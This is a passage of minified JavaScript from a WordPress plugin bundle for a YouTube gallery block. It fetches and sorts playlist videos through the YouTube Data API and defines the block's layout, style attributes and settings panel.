e.json();if(l.error)D(l.error.message||"Failed to fetch playlist."),j([]);else{let e=(l.items||[]).filter((e=>"Private video"!==e.snippet.title&&"Deleted video"!==e.snippet.title)).map((e=>({videoId:e.snippet.resourceId.videoId,title:e.snippet.title,thumbnail:e.snippet.thumbnails&&e.snippet.thumbnails[S]&&e.snippet.thumbnails[S].url,publishedAt:e.snippet.publishedAt||"",description:e.snippet.description||""}))),t=e;if("title"===p?t=e.slice().sort(((e,t)=>e.title.localeCompare(t.title))):"oldest"===p?t=e.slice().sort(((e,t)=>new Date(e.publishedAt)-new Date(t.publishedAt))):"date"===p||"latest"===p?t=e.slice().sort(((e,t)=>new Date(t.publishedAt)-new Date(e.publishedAt))):"popular"===p&&(t=e.slice().sort(((e,t)=>(t.viewCount||0)-(e.viewCount||0)))),e=t,"popular"===p){const t=e.map((e=>e.videoId)).join(",");try{const l=await fetch(`https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${t}&key=${oe}`),o=await l.json();if(o.items){const t={};o.items.forEach((e=>{t[e.id]=e.statistics.viewCount})),e.forEach((e=>{e.viewCount=parseInt(t[e.videoId]||0)}))}}catch(e){console.warn("Failed to fetch video statistics:",e)}}const i=(0,r.Qc)(e,p);if(j(i),a>0)try{localStorage.setItem(o,JSON.stringify({data:e,timestamp:n}))}catch(e){console.warn("Failed to cache videos:",e)}}}catch(e){console.error("Failed to fetch videos:",e),D("Failed to fetch videos. Please try again.")}finally{O(!1)}}(),()=>{e=!1}}),[ee,oe,p,s,S]),u((()=>{N.length>0&&!X&&Q(N[0])}),[N]),u((()=>{function e(e=!1){const t=window.innerWidth;let l,o;t<600?(l=g.sm||3,o=Number(f.sm)||1):t<900?(l=g.md||6,o=Number(f.md)||2):(l=g.lg||9,o=Number(f.lg)||3),q(l),Y(o),K(v?e?l:e=>Math.max(e,l):N.length)}return e(!0),window.addEventListener("resize",(()=>e(!1))),()=>window.removeEventListener("resize",(()=>e(!1)))}),[g,f,v,N.length]),u((()=>{n&&n.length>0?wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:n})}):le&&le.length>0&&A({youTubeApiKey:le})}),[n]),Z&&"playlist"!=e)return(0,o.createElement)("div",{className:"ultp-ytg-loading gallery-postx gallery-active"},(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}));if(Z&&"playlist"==e)return(0,o.createElement)("div",{className:"ultp-ytg-loading ultp-ytg-playlist-loading"},(0,o.createElement)("div",{className:"ytg-loader"}));const ae=(0,i.Z)("https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/","block_docs");return R?(0,o.createElement)("div",{className:"ultp-ytg-error"},R,(0,o.createElement)(a.Z,{value:oe,onChange:e=>{A({youTubeApiKey:e}),wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:e})})},isTextField:!0,attr:{placeholder:"Enter your YouTube developer API Key",label:"",help:""}}),(0,o.createElement)("div",{className:"ultp-ytg-error-message"},"Need help setting this up? Click"," ",(0,o.createElement)("a",{href:ae,target:"_blank",rel:"noopener noreferrer"},"here"),"for instructions")):0===N.length?null:"playlist"===e?(0,o.createElement)("div",{className:"ultp-ytg-playlist"},(0,o.createElement)("div",{className:"ultp-ytg-container ultp-layout-playlist"},(0,o.createElement)("div",{className:"ultp-ytg-main"},(0,o.createElement)(r.Y7,{video:X,autoplay:"playlist"==e?M:k,loop:w,mute:x,showPlayerControl:T,hideYoutubeLogo:_,showVideoTitle:y,showDescription:C,videoTitleLength:b,defaultYoutubeIcon:H,videoDescriptionLength:E})),(0,o.createElement)("div",{className:"ultp-ytg-playlist-sidebar"},(0,o.createElement)("div",{className:"ultp-ytg-playlist-items"},N.map((e=>(0,o.createElement)(d,{key:e.videoId,video:e,isActive:e.videoId===X?.videoId,imageHeightRatio:S,onClick:()=>Q(e),videoTitleLength:b,showDescription:C,videoDescriptionLength:E}))))))):(0,o.createElement)("div",{className:""},(0,o.createElement)("div",{className:`ultp-ytg-container ultp-layout-${e} ultp-ytg-${I} ${P?"ultp-ytg-view-list":"ultp-ytg-view-grid"} ultp-ytg-${L?"popup":""}`},N.slice(0,$).map((e=>(0,o.createElement)(m,{key:e.videoId,playIcon:B,video:e,isPlaying:W===e.videoId,onSelect:()=>V(e.videoId),showVideoTitle:y,showDescription:C,videoTitleLength:b,videoDescriptionLength:E,autoplay:k,loop:w,mute:x,defaultYoutubeIcon:H,showPlayerControl:T,hideYoutubeLogo:_,enableAnimation:U})))),v&&$<N.length&&(0,o.createElement)("div",{className:"ultp-ytg-loadmore-btn",onClick:()=>{K((e=>e+G))}},h))}},79187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},advanceId:{type:"string",default:""},sortBy:{type:"string",default:"date"},youTubeApiKey:{type:"string",default:""},playlistIdOrUrl:{type:"string",default:"PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},cacheDuration:{type:"string",default:"0"},layout:{type:"string",default:"inline"},galleryColumn:{type:"object",default:{lg:"3",xs:"1",sm:"2"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-view-grid, {{ULTP}} .ultp-ytg-view-list { display: grid; grid-template-columns: repeat({{galleryColumn}}, minmax(0, 1fr)); }"}]},enablePopup:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},customImgHeight:{type:"object",default:{lg:"250",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-video img, {{ULTP}} .ultp-ytg-video { height: {{customImgHeight}} !important; }\n\t\t\t\t{{ULTP}} .ultp-ytg-video img { width: 100%; }"}]},customImgHeightLg:{type:"object",default:{lg:"450",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"classic"}],selector:"{{ULTP}} .ultp-layout-classic .ultp-ytg-item:first-child .ultp-ytg-video { height: {{customImgHeightLg}} !important; } {{ULTP}} .ultp-ytg-video img { height: 100% !important; width: 100%; }"}]},playlistHeight:{type:"object",default:{lg:"450",xs:"850",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-layout-playlist { max-height: {{playlistHeight}}; }"}]},enableListView:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},displayType:{type:"string",default:"card",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showDescription",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showVideoTitle",condition:"==",value:!0}]}]},videosPerPage:{type:"object",default:{lg:6},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},imageHeightRatio:{type:"string",default:"maxres"},showVideoTitle:{type:"boolean",default:!0},videoTitleLength:{type:"object",default:{lg:90},style:[{depends:[{key:"showVideoTitle",condition:"==",value:!0}]}]},showDescription:{type:"boolean",default:!1},videoDescriptionLength:{type:"object",default:{lg:146},style:[{depends:[{key:"showDescription",condition:"==",value:!0}]}]},loadMoreEnable:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},moreButtonLabel:{type:"string",default:"More Videos",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},autoplay:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},autoplayPlaylist:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"playlist"}]}]},loop:{type:"boolean",default:!1},mute:{type:"boolean",default:!1},showPlayerControl:{type:"boolean",default:!0},hideYoutubeLogo:{type:"boolean",default:!1},gutterSpace:{type:"object",default:{lg:16,unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-view-grid,\n\t\t\t\t{{ULTP}} .ultp-ytg-view-list { gap: {{gutterSpace}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-layout-playlist { gap: {{gutterSpace}}; }"}]},itemBorderRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-video, {{ULTP}} .ultp-ytg-main iframe { border-radius: {{itemBorderRadius}}; overflow: hidden; }"}]},galleryItemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-video, {{ULTP}} .ultp-ytg-main iframe"}]},imageSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-content { margin-top: {{imageSpace}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-video"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-item .ultp-ytg-video:hover"}]},imgScale:{type:"string",default:"cover",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-item > .ultp-ytg-video > img {object-fit: {{imgScale}};} {{ULTP}} .ultp-ytg-item > .ultp-ytg-video { background-color: #000; }"}]},titleTypography:{type:"object",default:{openTypography:1,weight:"500",size:{lg:18,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-title a, {{ULTP}} .ultp-ytg-main .ultp-ytg-title a"}]},titleTypographySmall:{type:"object",default:{openTypography:1,weight:"500",size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-item-title"}]},descTypography:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:24,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-description"}]},titleColor:{type:"string",default:"",style:[{selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-title a { color: {{titleColor}} }"}]},titleColorLg:{type:"string",default:"#000",style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item-title { color: {{titleColorLg}} }"}]},titleHoverColor:{type:"string",default:"",style:[{selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-title a:hover { color: {{titleHoverColor}} }"}]},titleHoverColorSm:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item.active .ultp-ytg-playlist-item-title,\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item:hover .ultp-ytg-playlist-item-title { color: {{titleHoverColorSm}} }"}]},descColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-ytg-description { color: {{descColor}} }"}]},spaceTop:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showDescription",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-title a, {{ULTP}} .ultp-ytg-playlist-item-title { margin-bottom: {{spaceTop}}; } {{ULTP}} .ultp-ytg-title a { display: block; }"},{depends:[{key:"layout",condition:"==",value:"playlist"},{key:"showDescription",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-main .ultp-ytg-title a { margin-bottom: {{spaceTop}}; display: block; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#eaeaea",gradient:{}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"},{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-content"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-items"}]},singleContentBg:{type:"object",default:{openColor:1,type:"color",color:"#0000000d",gradient:{}},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-item.active, {{ULTP}} .ultp-ytg-playlist-item:hover "}]},contentPadding:{type:"object",default:{lg:{top:"16",bottom:"16",left:"16",right:"16",unit:"px"}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-content  { padding: {{contentPadding}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"},{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-playlist-sidebar .ultp-ytg-playlist-items  { padding: {{contentPadding}}; }"}]},contentRadius:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-content { border-radius: {{contentRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-items { border-radius: {{contentRadius}}; }"}]},defaultYoutubeIcon:{type:"boolean",default:!0},playIcon:{type:"string",default:"youtube_logo_icon_solid",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}]}]},iconColor:{type:"string",default:"#fff",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon { color: {{iconColor}}; }"}]},iconHoverColor:{type:"string",default:"#ffffff",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon:hover { color: {{iconHoverColor}}; }"}]},iconSize:{type:"object",default:{lg:40,unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"enableAnimation",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon svg { height: {{iconSize}}; width: {{iconSize}}; }"},{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"enableAnimation",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon svg { height: {{iconSize}}; width: {{iconSize}}; } {{ULTP}} .ultp-ytg-play__icon { height: calc({{iconSize}} + 20px); width: calc({{iconSize}} + 20px); }"}]},enableAnimation:{type:"boolean",default:!1},iconAnimationColor:{type:"string",default:"#fff",style:[{depends:[{key:"enableAnimation",condition:"==",value:!0}],selector:"{{ULTP}} { --ultp-pulse-color: {{iconAnimationColor}}; } "}]},loadMoreTypography:{type:"object",default:{openTypography:1,weight:"400",size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreSpace:{type:"object",default:{lg:60,unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { margin-top: {{loadMoreSpace}} !important; }"}]},loadMoreColor:{type:"string",default:"#ffffff",style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { color: {{loadMoreColor}}; }"}]},loadMoreBg:{type:"object",default:{openColor:1,type:"color",color:"#000",gradient:{}},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreBorderRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { border-radius: {{loadMoreBorderRadius}}; }"}]},loadMoreShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn"}]},loadMoreHoverColor:{type:"string",default:"#ffffff",style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover { color: {{loadMoreHoverColor}}; }"}]},loadMoreHoverBg:{type:"object",default:{openColor:1,type:"color",color:"rgba(119,119,119,1)",gradient:{}},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMoreHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMoreHoverRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover { border-radius: {{loadMoreHoverRadius}}; }"}]},loadMoreHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn:hover"}]},loadMorePadding:{type:"object",default:{lg:{top:10,right:25,bottom:10,left:25},unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-loadmore-btn { padding: {{loadMorePadding}}; }"}]},advanceZindex:{type:"string",default:""},hideExtraLarge:{type:"boolean",default:!1},hideTablet:{type:"boolean",default:!1},hideMobile:{type:"boolean",default:!1},advanceCss:{type:"string",default:""},ytgLoadingColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ytg-loader::before { border-color:{{ytgLoadingColor}}; }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapBg",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block { border-radius:{{wrapRadius}}; }"}]},{key:"wrapHoverBackground",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover { border-radius:{{wrapHoverRadius}}; }"}]},{key:"wrapHoverShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapMargin",style:[{selector:"{{ULTP}} .ultp-wrapper-block { margin:{{wrapMargin}}; }"}]},{key:"wrapOuterPadding",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]},{key:"advanceZindex",style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]}])}},68944:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(93673),n=l(79187),r=l(6947);l(16672);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/youtube-gallery.svg",alt:"PostX Youtube Gallery Block"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display a customizable YouTube video gallery or playlist.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/youtube_gallery.svg"}},edit:i.Z,save:()=>null})},68533:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(60448),i=l(53049),n=l(92637),r=l(43581);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=({store:e})=>{const{loadMoreEnable:t,galleryLayout:l}=e.attributes;return(0,o.createElement)(s,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid9096",store:e}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"general",title:__("General","ultimate-post")},(0,o.createElement)("div",{className:"ultp-preset-label-link ultp-youtube-dev-api-key",onClick:()=>(0,a.je)("typo")},"Configure Youtube Developer Key"),(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Settings","ultimate-post"),include:[{position:1,data:{type:"select",key:"sortBy",pro:!0,label:__("Sort By","ultimate-post"),options:[{value:"date",label:__("Date","ultimate-post")},{value:"relevance",label:__("Relevance","ultimate-post")},{value:"title",label:__("Title","ultimate-post")},{value:"popular",label:__("Most Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}},{position:3,data:{type:"text",key:"playlistIdOrUrl",label:__("Youtube Playlist URL/Channel ID","ultimate-post")}},{position:4,data:{type:"select",key:"cacheDuration",pro:!0,label:__("Cache Duration","ultimate-post"),options:[{value:"0",label:__("No Cache","ultimate-post")},{value:"3600",label:__("15 Min","ultimate-post")},{value:"86400",label:__("30 Min","ultimate-post")},{value:"604800",label:__("1 Hour","ultimate-post")},{value:"604800",label:__("1 day","ultimate-post")},{value:"604800",label:__("1 Week","ultimate-post")},{value:"604800",label:__("1 Month","ultimate-post")}]}}]}),(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Gallery Layout","ultimate-post"),include:[{position:1,data:{type:"layout",key:"layout",isInline:!1,label:__("Gallery Layout","ultimate-post"),options:[{value:"classic",img:"assets/img/layouts/yt_gallery/classic.svg",pro:!0,label:__("Classic","ultimate-post")},{value:"playlist",img:"assets/img/layouts/yt_gallery/playlist.svg",label:__("Playlist","ultimate-post"),pro:!0},{img:"assets/img/layouts/yt_gallery/inline.svg",value:"inline",label:__("Inline","ultimate-post"),pro:!1}]}},{position:1.1,data:{type:"range",key:"playlistHeight",label:__("Playlist Height","ultimate-post"),min:300,max:1e3,step:10,responsive:!0,unit:!1}},{position:3,data:{type:"range",key:"galleryColumn",min:1,max:6,step:1,responsive:!0,unit:!1,label:__("Gallery Column","ultimate-post")}},{position:4,data:{type:"range",key:"videosPerPage",label:__("Videos Per Page","ultimate-post"),min:1,max:50,step:1,responsive:!0}},{position:15,data:{type:"separator"}},{position:16,data:{type:"toggle",key:"loadMoreEnable",label:__("Load More Enable","ultimate-post")}},{position:17,data:{type:"text",key:"moreButtonLabel",label:__("More Button Label","ultimate-post")}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Gallery Single Item","ultimate-post"),include:[{position:6,data:{type:"group",justify:!0,key:"displayType",label:__("Display ( Card/Item ) Type","ultimate-post"),options:[{value:"card",label:__("Card","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")}]}},{position:7,data:{type:"select",key:"imageHeightRatio",label:__("Thumbnail Height Ratio","ultimate-post"),options:[{value:"default",label:"Default"},{value:"high",label:"High"},{value:"maxres",label:"Maximum"},{value:"medium",label:"Medium"},{value:"standard",label:"Standard"}]}},{position:8,data:{type:"range",key:"customImgHeight",label:__("Image Height","ultimate-post"),min:0,max:1e3,step:1,responsive:!0}},{position:9,data:{type:"range",key:"customImgHeightLg",label:__("Large Image Height","ultimate-post"),min:0,max:1e3,step:1,responsive:!0}},{position:10,data:{type:"separator"}},{position:11,data:{type:"toggle",key:"showVideoTitle",label:__("Show Video Title","ultimate-post")}},{position:12,data:{type:"range",key:"videoTitleLength",label:__("Video Title Length","ultimate-post"),min:0,max:200,step:1,responsive:!0}},{position:13,data:{type:"toggle",key:"showDescription",label:__("Show Description","ultimate-post")}},{position:14,data:{type:"range",key:"videoDescriptionLength",label:__("Video Description Length","ultimate-post"),min:0,max:500,step:1,responsive:!0}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Video/Player Options","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"autoplay",label:__("Autoplay","ultimate-post")}},{position:2,data:{type:"toggle",key:"autoplayPlaylist",label:__("Autoplay","ultimate-post")}},{position:3,data:{type:"toggle",key:"loop",label:__("Loop","ultimate-post")}},{position:4,data:{type:"toggle",key:"mute",label:__("Mute","ultimate-post")}},{position:5,data:{type:"toggle",key:"showPlayerControl",label:__("Show Player Control","ultimate-post")}}]})),(0,o.createElement)(n.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(i.T,{initialOpen:!0,store:e,title:__("Gallery","ultimate-post"),include:[{position:1,data:{type:"range",key:"gutterSpace",label:__("Gutter Space","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:2,data:{type:"border",key:"galleryItemBorder",label:__("Image Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"itemBorderRadius",label:__("Image Border Radius","ultimate-post"),responsive:!0}},{position:4,data:{type:"range",key:"imageSpace",label:__("Image Space","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:5,data:{type:"boxshadow",key:"imgShadow",label:__("Image shadow","ultimate-post")}},{position:5,data:{type:"boxshadow",key:"imgHoverShadow",label:__("Image Hover shadow","ultimate-post")}},{position:6,data:{type:"group",key:"imgScale",justify:!0,options:[{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Container","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}],label:__("Image Scale","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Title & Description & Content","ultimate-post"),include:[{position:1,data:{type:"typography",key:"titleTypography",label:__("Title Typography","ultimate-post")}},{position:2,data:{type:"typography",key:"titleTypographySmall",label:__("Small Title Typography","ultimate-post")}},{position:3,data:{type:"typography",key:"descTypography",label:__("Description Typography","ultimate-post")}},{position:4,data:{type:"separator"}},{position:5,data:{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")}},{position:6,data:{type:"color",key:"titleColorLg",label:__("Small Title Color","ultimate-post")}},{position:7,data:{type:"color",key:"titleHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:8,data:{type:"color",key:"titleHoverColorSm",label:__("Small Title Hover Color","ultimate-post")}},{position:9,data:{type:"color",key:"descColor",label:__("Description Color","ultimate-post")}},{position:9.1,data:{type:"separator"}},{position:10,data:{type:"range",key:"spaceTop",label:__("Desc. Space Top","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:11,data:{type:"color2",key:"contentBg",label:__("Content Background","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:12,data:{type:"color2",key:"singleContentBg",label:__("Single Content Background","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:13,data:{type:"dimension",responsive:!0,key:"contentPadding",label:__("Content Padding","ultimate-post")}},{position:14,data:{type:"dimension",key:"contentRadius",step:1,responsive:!0,label:__("Content Radius","ultimate-post")}}]}),(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Play Icon & Style","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"defaultYoutubeIcon",pro:!0,label:__("Default Youtube Icon","ultimate-post")}},{position:1,data:{type:"icon",key:"playIcon",label:__("Icon","ultimate-post")}},{position:2,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"iconHoverColor",label:__("Hover Color","ultimate-post")}},{position:6,data:{type:"range",key:"iconSize",label:__("Icon Size","ultimate-post"),min:0,max:150,step:1,responsive:!0}},{position:7,data:{type:"toggle",key:"enableAnimation",pro:!0,label:__("Icon Animation","ultimate-post")}},{position:8,data:{type:"color",key:"iconAnimationColor",label:__("Animation Color","ultimate-post")}}]}),t&&"playlist"!=l&&(0,o.createElement)(i.T,{initialOpen:!1,store:e,title:__("Load More","ultimate-post"),include:[{position:1,data:{type:"typography",key:"loadMoreTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{title:__("Normal","ultimate-post"),name:"normal",options:[{type:"color",key:"loadMoreColor",label:__("Color","ultimate-post")},{type:"color2",key:"loadMoreBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreBorderRadius",responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"loadMoreShadow",step:1,unit:!0,responsive:!0,label:__("Image Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"loadMoreHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"loadMoreHoverBg",label:__("Hover Background","ultimate-post")},{type:"border",key:"loadMoreHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",responsive:!0,key:"loadMoreHoverRadius",label:__("Hover Border Radius","ultimate-post")},{type:"boxshadow",key:"loadMoreHoverShadow",step:1,unit:!0,responsive:!0,label:__("Load More Box Shadow","ultimate-post")}]}]}},{position:3,data:{type:"dimension",responsive:!0,key:"loadMorePadding",label:__("Padding","ultimate-post")}},{position:4,data:{type:"range",key:"loadMoreSpace",label:__("Space Between","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post"),include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post")}}]},(0,o.createElement)(i.yB,{initialOpen:!0,store:e}),(0,o.createElement)(i.Mg,{pro:!0,store:e}),(0,o.createElement)(i.iv,{store:e}))))}},60307:(e,t,l)=>{"use strict";l.d(t,{Qc:()=>r,Y7:()=>i,aF:()=>a,eT:()=>s,v8:()=>n});var o=l(67294);function a(e,t){if(!e)return"";const l=window.innerWidth;let o;return o=l<600?t.sm:l<900?t.md:t.lg,e.length>o?e.substring(0,o)+"...":e}const 